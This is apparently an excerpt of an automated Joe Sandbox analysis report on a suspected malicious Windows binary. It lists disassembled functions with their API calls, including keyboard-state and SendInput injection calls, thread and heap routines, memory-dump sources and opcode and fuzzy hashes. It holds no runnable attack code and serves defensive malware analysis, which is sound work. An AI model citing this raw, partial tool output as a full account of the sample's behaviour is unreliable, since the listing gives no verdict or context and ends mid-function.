                                                                        • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                        • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                        Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0041F707
                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                        • _free.LIBCMT ref: 0041F71A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free_malloc
                                                                        • String ID: [B
                                                                        • API String ID: 1020059152-632041663
                                                                        • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                        • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                        • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                        • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                        Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                        • __calloc_crt.LIBCMT ref: 00413DB0
                                                                        • __getptd.LIBCMT ref: 00413DBD
                                                                        • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                        • _free.LIBCMT ref: 00413E07
                                                                        • __dosmaperr.LIBCMT ref: 00413E12
                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                        • String ID:
                                                                        • API String ID: 155776804-0
                                                                        • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                        • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                        • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                        • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                        Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                          • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                        • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                        • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                        • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                        Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                        • String ID:
                                                                        • API String ID: 259663610-0
                                                                        • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                        • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                        • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                        • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                        Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 004302E6
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                        • GetClientRect.USER32(?,?), ref: 00430364
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                        • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                        • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                        • String ID:
                                                                        • API String ID: 3220332590-0
                                                                        • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                        • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                        • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                        • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                        Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1612042205-0
                                                                        • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                        • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                        • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                        • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                        Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove_strncmp
                                                                        • String ID: >$U$\
                                                                        • API String ID: 2666721431-237099441
                                                                        • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                        • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                        • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                        • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                        Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 0044C570
                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$InputSend
                                                                        • String ID:
                                                                        • API String ID: 2221674350-0
                                                                        • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                        • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                        • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                        • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                        Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$_wcscat
                                                                        • String ID:
                                                                        • API String ID: 2037614760-0
                                                                        • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                        • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                        • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                        • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                        Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                        • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Copy$AllocClearErrorLastString
                                                                        • String ID:
                                                                        • API String ID: 960795272-0
                                                                        • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                        • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                        • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                        • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                        Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                        • String ID:
                                                                        • API String ID: 4189319755-0
                                                                        • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                        • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                        • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                        • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                        Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                        • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                        • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow$InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 1976402638-0
                                                                        • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                        • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                        • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                        • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                        Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                        • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                        • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                        • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                        • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 642888154-0
                                                                        • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                        • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                        • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                        • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                        Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
